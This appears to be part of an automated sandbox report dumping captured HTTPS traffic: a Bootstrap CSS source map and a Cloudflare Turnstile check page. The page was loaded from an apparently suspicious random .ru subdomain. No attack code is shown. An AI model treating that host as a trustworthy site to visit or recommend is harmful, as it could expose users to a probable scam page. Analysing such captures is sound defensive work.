                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:31 GMT
                                                                                                                                                                                    Age: 1846595
                                                                                                                                                                                    X-Served-By: cache-fra-eddf8230033-FRA, cache-pdk-kfty2130078-PDK
                                                                                                                                                                                    X-Cache: HIT, MISS
                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                    alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1378INData Raw: 7b 22 76 65 72 73 69 6f 6e 22 3a 33 2c 22 73 6f 75 72 63 65 73 22 3a 5b 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 5f 72 6f 6f 74 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 5f 72 65 62 6f 6f 74 2e 73 63 73 73 22 2c 22 64 69 73 74 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 76 65 6e 64 6f 72 2f 5f 72 66 73 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 6d 69 78 69 6e 73 2f 5f 62 6f 72 64 65 72 2d 72 61 64 69 75 73 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 5f 74 79 70 65 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 6d 69 78 69 6e 73 2f 5f 6c 69 73 74 73 2e 73 63 73 73 22 2c 22 2e
                                                                                                                                                                                    Data Ascii: {"version":3,"sources":["../../scss/bootstrap.scss","../../scss/_root.scss","../../scss/_reboot.scss","dist/css/bootstrap.css","../../scss/vendor/_rfs.scss","../../scss/mixins/_border-radius.scss","../../scss/_type.scss","../../scss/mixins/_lists.scss",".
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1378INData Raw: 2f 6d 69 78 69 6e 73 2f 5f 61 6c 65 72 74 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 5f 70 72 6f 67 72 65 73 73 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 5f 6c 69 73 74 2d 67 72 6f 75 70 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 6d 69 78 69 6e 73 2f 5f 6c 69 73 74 2d 67 72 6f 75 70 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 5f 63 6c 6f 73 65 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 5f 74 6f 61 73 74 73 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 5f 6d 6f 64 61 6c 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 5f 74 6f 6f 6c 74 69 70 2e 73 63 73 73 22 2c 22 2e 2e 2f 2e 2e 2f 73 63 73 73 2f 6d 69 78 69 6e 73 2f 5f 72 65 73 65 74 2d 74 65 78 74 2e 73 63 73 73 22
                                                                                                                                                                                    Data Ascii: /mixins/_alert.scss","../../scss/_progress.scss","../../scss/_list-group.scss","../../scss/mixins/_list-group.scss","../../scss/_close.scss","../../scss/_toasts.scss","../../scss/_modal.scss","../../scss/_tooltip.scss","../../scss/mixins/_reset-text.scss"
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1378INData Raw: 51 41 45 41 2c 69 42 41 41 41 2c 4b 41 43 41 2c 79 42 41 41 41 2c 4b 41 43 41 2c 34 42 41 41 41 2c 59 41 53 46 2c 47 41 43 45 2c 4f 41 41 41 2c 4b 41 41 41 2c 45 41 43 41 2c 4d 41 41 41 2c 51 41 43 41 2c 69 42 41 41 41 2c 61 41 43 41 2c 4f 41 41 41 2c 45 41 43 41 2c 51 41 41 41 2c 49 41 47 46 2c 65 41 43 45 2c 4f 41 41 41 2c 49 41 55 46 2c 49 41 41 41 2c 49 41 41 41 2c 49 41 41 41 2c 49 41 41 41 2c 49 41 41 41 2c 49 41 41 41 2c 47 41 41 41 2c 47 41 41 41 2c 47 41 41 41 2c 47 41 41 41 2c 47 41 41 41 2c 47 41 43 45 2c 57 41 41 41 2c 45 41 43 41 2c 63 41 41 41 2c 4d 41 47 41 2c 59 41 41 41 2c 49 41 43 41 2c 59 41 41 41 2c 49 41 49 46 2c 49 41 41 41 2c 47 45 34 4d 51 2c 55 41 41 41 2c 75 42 41 6c 4b 4a 2c 30 42 46 31 43 4a 2c 49 41 41 41 2c 47 45 6d 4e 51 2c
                                                                                                                                                                                    Data Ascii: QAEA,iBAAA,KACA,yBAAA,KACA,4BAAA,YASF,GACE,OAAA,KAAA,EACA,MAAA,QACA,iBAAA,aACA,OAAA,EACA,QAAA,IAGF,eACE,OAAA,IAUF,IAAA,IAAA,IAAA,IAAA,IAAA,IAAA,GAAA,GAAA,GAAA,GAAA,GAAA,GACE,WAAA,EACA,cAAA,MAGA,YAAA,IACA,YAAA,IAIF,IAAA,GE4MQ,UAAA,uBAlKJ,0BF1CJ,IAAA,GEmNQ,
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1378INData Raw: 59 41 41 41 2c 4d 41 43 41 2c 65 41 41 41 2c 4d 41 43 41 2c 4d 41 41 41 2c 51 41 43 41 2c 57 41 41 41 2c 4b 41 4f 46 2c 47 41 45 45 2c 57 41 41 41 2c 51 41 43 41 2c 57 41 41 41 2c 71 42 43 2f 45 46 2c 4d 41 47 41 2c 47 41 46 41 2c 4d 41 47 41 2c 47 44 38 45 41 2c 4d 43 68 46 41 2c 47 44 73 46 45 2c 61 41 41 41 2c 51 41 43 41 2c 61 41 41 41 2c 4d 41 43 41 2c 61 41 41 41 2c 45 41 51 46 2c 4d 41 43 45 2c 51 41 41 41 2c 61 41 4d 46 2c 4f 41 45 45 2c 63 41 41 41 2c 45 41 51 46 2c 69 43 41 43 45 2c 51 41 41 41 2c 45 43 37 46 46 2c 4f 44 6b 47 41 2c 4d 43 68 47 41 2c 53 41 44 41 2c 4f 41 45 41 2c 53 44 6f 47 45 2c 4f 41 41 41 2c 45 41 43 41 2c 59 41 41 41 2c 51 45 31 48 49 2c 55 41 41 41 2c 51 46 34 48 4a 2c 59 41 41 41 2c 51 41 49 46 2c 4f 43 6e 47 41 2c 4f 44
                                                                                                                                                                                    Data Ascii: YAAA,MACA,eAAA,MACA,MAAA,QACA,WAAA,KAOF,GAEE,WAAA,QACA,WAAA,qBC/EF,MAGA,GAFA,MAGA,GD8EA,MChFA,GDsFE,aAAA,QACA,aAAA,MACA,aAAA,EAQF,MACE,QAAA,aAMF,OAEE,cAAA,EAQF,iCACE,QAAA,EC7FF,ODkGA,MChGA,SADA,OAEA,SDoGE,OAAA,EACA,YAAA,QE1HI,UAAA,QF4HJ,YAAA,QAIF,OCnGA,OD
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1378INData Raw: 2c 63 41 41 41 2c 4b 46 2b 4d 49 2c 55 41 41 41 2c 51 45 35 4d 4a 2c 77 42 41 43 45 2c 63 41 41 41 2c 45 41 49 4a 2c 6d 42 41 43 45 2c 57 41 41 41 2c 4d 41 43 41 2c 63 41 41 41 2c 4b 46 71 4d 49 2c 55 41 41 41 2c 4f 45 6e 4d 4a 2c 4d 41 41 41 2c 51 41 45 41 2c 32 42 41 43 45 2c 51 41 41 41 2c 4b 45 39 46 4a 2c 57 43 49 45 2c 55 41 41 41 2c 4b 41 47 41 2c 4f 41 41 41 2c 4b 44 44 46 2c 65 41 43 45 2c 51 41 41 41 2c 4f 41 43 41 2c 69 42 41 41 41 2c 4b 41 43 41 2c 4f 41 41 41 2c 49 41 41 41 2c 4d 41 41 41 2c 51 48 47 45 2c 63 41 41 41 2c 4f 49 52 46 2c 55 41 41 41 2c 4b 41 47 41 2c 4f 41 41 41 2c 4b 44 63 46 2c 51 41 45 45 2c 51 41 41 41 2c 61 41 47 46 2c 59 41 43 45 2c 63 41 41 41 2c 4d 41 43 41 2c 59 41 41 41 2c 45 41 47 46 2c 67 42 4a 2b 50 4d 2c 55 41 41
                                                                                                                                                                                    Data Ascii: ,cAAA,KF+MI,UAAA,QE5MJ,wBACE,cAAA,EAIJ,mBACE,WAAA,MACA,cAAA,KFqMI,UAAA,OEnMJ,MAAA,QAEA,2BACE,QAAA,KE9FJ,WCIE,UAAA,KAGA,OAAA,KDDF,eACE,QAAA,OACA,iBAAA,KACA,OAAA,IAAA,MAAA,QHGE,cAAA,OIRF,UAAA,KAGA,OAAA,KDcF,QAEE,QAAA,aAGF,YACE,cAAA,MACA,YAAA,EAGF,gBJ+PM,UAA
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1378INData Raw: 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 49 41 46 46 2c 69 42 41 43 45 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 65 41 46 46 2c 69 42 41 43 45 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 49 41 46 46 2c 69 42 41 43 45 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 49 41 46 46 2c 69 42 41 43 45 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 67 42 46 4d 41 2c 79 42 45 53 45 2c 51 41 43 45 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 47 41 47 46 2c 6f 42 41 70 43 4a 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 4b 41 63 41 2c 69 42 41 43 45 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41
                                                                                                                                                                                    Data Ascii: A,EAAA,KACA,MAAA,IAFF,iBACE,KAAA,EAAA,EAAA,KACA,MAAA,eAFF,iBACE,KAAA,EAAA,EAAA,KACA,MAAA,IAFF,iBACE,KAAA,EAAA,EAAA,KACA,MAAA,IAFF,iBACE,KAAA,EAAA,EAAA,KACA,MAAA,gBFMA,yBESE,QACE,KAAA,EAAA,EAAA,GAGF,oBApCJ,KAAA,EAAA,EAAA,KACA,MAAA,KAcA,iBACE,KAAA,EAAA,EAAA
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1378INData Raw: 41 43 41 2c 4d 41 41 41 2c 49 41 71 45 4d 2c 51 41 74 45 4e 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 61 41 71 45 4d 2c 51 41 74 45 4e 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 61 41 71 45 4d 2c 51 41 74 45 4e 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 4b 41 36 45 51 2c 55 41 39 44 56 2c 59 41 41 41 2c 59 41 38 44 55 2c 55 41 39 44 56 2c 59 41 41 41 2c 61 41 38 44 55 2c 55 41 39 44 56 2c 59 41 41 41 2c 49 41 38 44 55 2c 55 41 39 44 56 2c 59 41 41 41 2c 61 41 38 44 55 2c 55 41 39 44 56 2c 59 41 41 41 2c 61 41 38 44 55 2c 55 41 39 44 56 2c 59 41 41 41 2c 49 41 38 44 55 2c 55 41 39 44 56 2c 59 41 41 41 2c 61 41 38 44 55 2c 55 41 39 44 56 2c 59 41 41 41
                                                                                                                                                                                    Data Ascii: ACA,MAAA,IAqEM,QAtEN,KAAA,EAAA,EAAA,KACA,MAAA,aAqEM,QAtEN,KAAA,EAAA,EAAA,KACA,MAAA,aAqEM,QAtEN,KAAA,EAAA,EAAA,KACA,MAAA,KA6EQ,UA9DV,YAAA,YA8DU,UA9DV,YAAA,aA8DU,UA9DV,YAAA,IA8DU,UA9DV,YAAA,aA8DU,UA9DV,YAAA,aA8DU,UA9DV,YAAA,IA8DU,UA9DV,YAAA,aA8DU,UA9DV,YAAA
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1378INData Raw: 55 2c 63 41 41 41 2c 51 41 50 46 2c 51 58 67 6a 43 52 2c 53 57 39 69 43 55 2c 63 41 41 41 2c 4f 41 47 46 2c 51 58 67 6a 43 52 2c 53 57 39 69 43 55 2c 63 41 41 41 2c 4f 41 50 46 2c 51 58 30 6a 43 52 2c 53 57 78 6a 43 55 2c 63 41 41 41 2c 4b 41 47 46 2c 51 58 30 6a 43 52 2c 53 57 78 6a 43 55 2c 63 41 41 41 2c 4b 41 50 46 2c 51 58 6f 6b 43 52 2c 53 57 6c 6b 43 55 2c 63 41 41 41 2c 4f 41 47 46 2c 51 58 6f 6b 43 52 2c 53 57 6c 6b 43 55 2c 63 41 41 41 2c 4f 41 50 46 2c 51 58 38 6b 43 52 2c 53 57 35 6b 43 55 2c 63 41 41 41 2c 4b 41 47 46 2c 51 58 38 6b 43 52 2c 53 57 35 6b 43 55 2c 63 41 41 41 2c 4d 46 2f 44 4e 2c 79 42 45 2b 42 45 2c 61 41 74 44 4a 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 4b 41 32 44 51 2c 55 41 74 45 4e 2c
                                                                                                                                                                                    Data Ascii: U,cAAA,QAPF,QXgjCR,SW9iCU,cAAA,OAGF,QXgjCR,SW9iCU,cAAA,OAPF,QX0jCR,SWxjCU,cAAA,KAGF,QX0jCR,SWxjCU,cAAA,KAPF,QXokCR,SWlkCU,cAAA,OAGF,QXokCR,SWlkCU,cAAA,OAPF,QX8kCR,SW5kCU,cAAA,KAGF,QX8kCR,SW5kCU,cAAA,MF/DN,yBE+BE,aAtDJ,KAAA,EAAA,EAAA,KACA,MAAA,KA2DQ,UAtEN,
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1378INData Raw: 55 41 74 45 4e 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 61 41 71 45 4d 2c 55 41 74 45 4e 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 49 41 71 45 4d 2c 55 41 74 45 4e 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 61 41 71 45 4d 2c 55 41 74 45 4e 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 61 41 71 45 4d 2c 55 41 74 45 4e 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 49 41 71 45 4d 2c 57 41 74 45 4e 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 61 41 71 45 4d 2c 57 41 74 45 4e 2c 4b 41 41 41 2c 45 41 41 41 2c 45 41 41 41 2c 4b 41 43 41 2c 4d 41 41 41 2c 61 41
                                                                                                                                                                                    Data Ascii: UAtEN,KAAA,EAAA,EAAA,KACA,MAAA,aAqEM,UAtEN,KAAA,EAAA,EAAA,KACA,MAAA,IAqEM,UAtEN,KAAA,EAAA,EAAA,KACA,MAAA,aAqEM,UAtEN,KAAA,EAAA,EAAA,KACA,MAAA,aAqEM,UAtEN,KAAA,EAAA,EAAA,KACA,MAAA,IAqEM,WAtEN,KAAA,EAAA,EAAA,KACA,MAAA,aAqEM,WAtEN,KAAA,EAAA,EAAA,KACA,MAAA,aA
                                                                                                                                                                                    2024-01-26 13:41:31 UTC1378INData Raw: 2c 61 41 39 44 56 2c 59 41 41 41 2c 49 41 38 44 55 2c 61 41 39 44 56 2c 59 41 41 41 2c 61 41 38 44 55 2c 61 41 39 44 56 2c 59 41 41 41 2c 61 41 38 44 55 2c 61 41 39 44 56 2c 59 41 41 41 2c 49 41 38 44 55 2c 63 41 39 44 56 2c 59 41 41 41 2c 61 41 38 44 55 2c 63 41 39 44 56 2c 59 41 41 41 2c 61 41 79 45 4d 2c 51 58 73 69 44 52 2c 53 57 70 69 44 55 2c 63 41 41 41 2c 45 41 47 46 2c 51 58 73 69 44 52 2c 53 57 70 69 44 55 2c 63 41 41 41 2c 45 41 50 46 2c 51 58 67 6a 44 52 2c 53 57 39 69 44 55 2c 63 41 41 41 2c 51 41 47 46 2c 51 58 67 6a 44 52 2c 53 57 39 69 44 55 2c 63 41 41 41 2c 51 41 50 46 2c 51 58 30 6a 44 52 2c 53 57 78 6a 44 55 2c 63 41 41 41 2c 4f 41 47 46 2c 51 58 30 6a 44 52 2c 53 57 78 6a 44 55 2c 63 41 41 41 2c 4f 41 50 46 2c 51 58 6f 6b 44 52 2c 53
                                                                                                                                                                                    Data Ascii: ,aA9DV,YAAA,IA8DU,aA9DV,YAAA,aA8DU,aA9DV,YAAA,aA8DU,aA9DV,YAAA,IA8DU,cA9DV,YAAA,aA8DU,cA9DV,YAAA,aAyEM,QXsiDR,SWpiDU,cAAA,EAGF,QXsiDR,SWpiDU,cAAA,EAPF,QXgjDR,SW9iDU,cAAA,QAGF,QXgjDR,SW9iDU,cAAA,QAPF,QX0jDR,SWxjDU,cAAA,OAGF,QX0jDR,SWxjDU,cAAA,OAPF,QXokDR,S


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    13192.168.2.1649736104.17.3.1844436752C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-01-26 13:41:30 UTC826OUTGET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/v8qzf/0x4AAAAAAAQlQKVshTj02gAC/auto/normal HTTP/1.1
                                                                                                                                                                                    Host: challenges.cloudflare.com
                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                    Upgrade-Insecure-Requests: 1
                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                    Sec-Fetch-Mode: navigate
                                                                                                                                                                                    Sec-Fetch-User: ?1
                                                                                                                                                                                    Sec-Fetch-Dest: iframe
                                                                                                                                                                                    Referer: https://bggcwvekn3axi3ffz5ai.rvucouijw.ru/
                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1211INHTTP/1.1 200 OK
                                                                                                                                                                                    Date: Fri, 26 Jan 2024 13:41:30 GMT
                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                                                                                                                                    cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                    content-security-policy: frame-src https://challenges.cloudflare.com/ blob:; base-uri 'self'
                                                                                                                                                                                    cross-origin-embedder-policy: require-corp
                                                                                                                                                                                    cross-origin-opener-policy: same-origin
                                                                                                                                                                                    cross-origin-resource-policy: cross-origin
                                                                                                                                                                                    document-policy: js-profiling
                                                                                                                                                                                    origin-agent-cluster: ?1
                                                                                                                                                                                    permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                                                                                                                                    referrer-policy: same-origin
                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                    CF-RAY: 84b92c841f99b127-ATL
                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                    2024-01-26 13:41:30 UTC158INData Raw: 37 61 66 34 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20
                                                                                                                                                                                    Data Ascii: 7af4<!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex,
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 6c 6f 61 64 22 20 68 72 65 66 3d 22 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 68 2f 67 2f 63 6d 67 2f 31 2f 77 68 30 45 30 53 58 59 6e 78 36 70 54 42 64 4a 57 25 32 46 6c 39 32 36 49 25 32 42 50 52 55 70 6c 52 64 74 51 7a 33 4b 39 6c 48 58 73 25 32 46 73 25 33 44 22 20 61 73 3d 22 69 6d 61 67 65 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 68 65 63 6b 69 6e
                                                                                                                                                                                    Data Ascii: nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <link rel="preload" href="/cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D" as="image"> <title>Checkin
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 74 65 6d 2d 75 69 2c 20 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 72 6f 62 6f 74 6f 2c 20 6f 78 79 67 65 6e 2c 20 75 62 75 6e 74 75 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 61 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 20 61 6e 74 69 61 6c 69 61 73 65 64 3b 0a 20 20 66 6f 6e 74 2d 73 74 79 6c 65 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 0a 68 31 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 31 36 70 78 20 30 3b 0a 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 6c 69 6e 65
                                                                                                                                                                                    Data Ascii: tem-ui, blinkmacsystemfont, "Segoe UI", roboto, oxygen, ubuntu, "Helvetica Neue", arial, sans-serif; font-size: 14px; font-weight: 400; -webkit-font-smoothing: antialiased; font-style: normal;}h1 { margin: 16px 0; text-align: center; line
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 30 2e 35 33 29 20 62 6f 74 68 3b 0a 20 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3a 20 36 70 78 3b 0a 20 20 73 74 72 6f 6b 65 3a 20 23 66 38 66 38 66 38 3b 0a 20 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3a 20 31 30 3b 0a 7d 0a 23 73 75 63 63 65 73 73 2d 69 63 6f 6e 20 2e 70 31 20 7b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 61 72 72 61 79 3a 20 32 34 32 3b 0a 20 20 73 74 72 6f 6b 65 2d 64 61 73 68 6f 66 66 73 65 74 3a 20 32 34 32 3b 0a 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 69 6e 73 65 74 20 30 20 30 20 30 20 23 30 33 38 31 32 37 3b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 74 72 6f 6b 65 20 30 2e 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 30 2e 36 35 2c 20 30 2c 20 30 2e 34 35 2c 20 31 29 20 66 6f 72 77 61 72 64 73 3b 0a 20 20 61 6e
                                                                                                                                                                                    Data Ascii: 0.53) both; stroke-width: 6px; stroke: #f8f8f8; stroke-miterlimit: 10;}#success-icon .p1 { stroke-dasharray: 242; stroke-dashoffset: 242; box-shadow: inset 0 0 0 #038127; animation: stroke 0.4s cubic-bezier(0.65, 0, 0.45, 1) forwards; an
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 3b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 66 6f 63 75 73 20 7e 20 2e 6d 61 72 6b 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 61 63 74 69 76 65 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 6f 72 64 65 72 3a 20 32 70 78 20 73 6f 6c 69 64 20 23 66 62 61 64 34 31 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 2e 63 74 70 2d 63 68 65 63 6b 62 6f 78 2d 6c 61 62 65 6c 20 69 6e 70 75 74 3a 63 68 65 63 6b 65 64 20 7e 20 2e 6d 61 72 6b 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 36 64 36 64 36 64 3b 0a 7d
                                                                                                                                                                                    Data Ascii: ; background-color: #222;}.theme-dark .ctp-checkbox-label input:focus ~ .mark, .theme-dark .ctp-checkbox-label input:active ~ .mark { border: 2px solid #fbad41;}.theme-dark .ctp-checkbox-label input:checked ~ .mark { background-color: #6d6d6d;}
                                                                                                                                                                                    2024-01-26 13:41:30 UTC1369INData Raw: 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 20 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a 6c 69 6e 6b 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 76 69 73 69 74 65 64 2c 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 6f 6f 70 2d 6c 69 6e 6b 3a 6c 69 6e 6b 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 62 62 3b 0a 7d 0a 2e 74 68 65 6d 65 2d 64 61 72 6b 20 23 66 72 2d 68 65 6c 70 65 72 2d 6c 69 6e 6b 3a
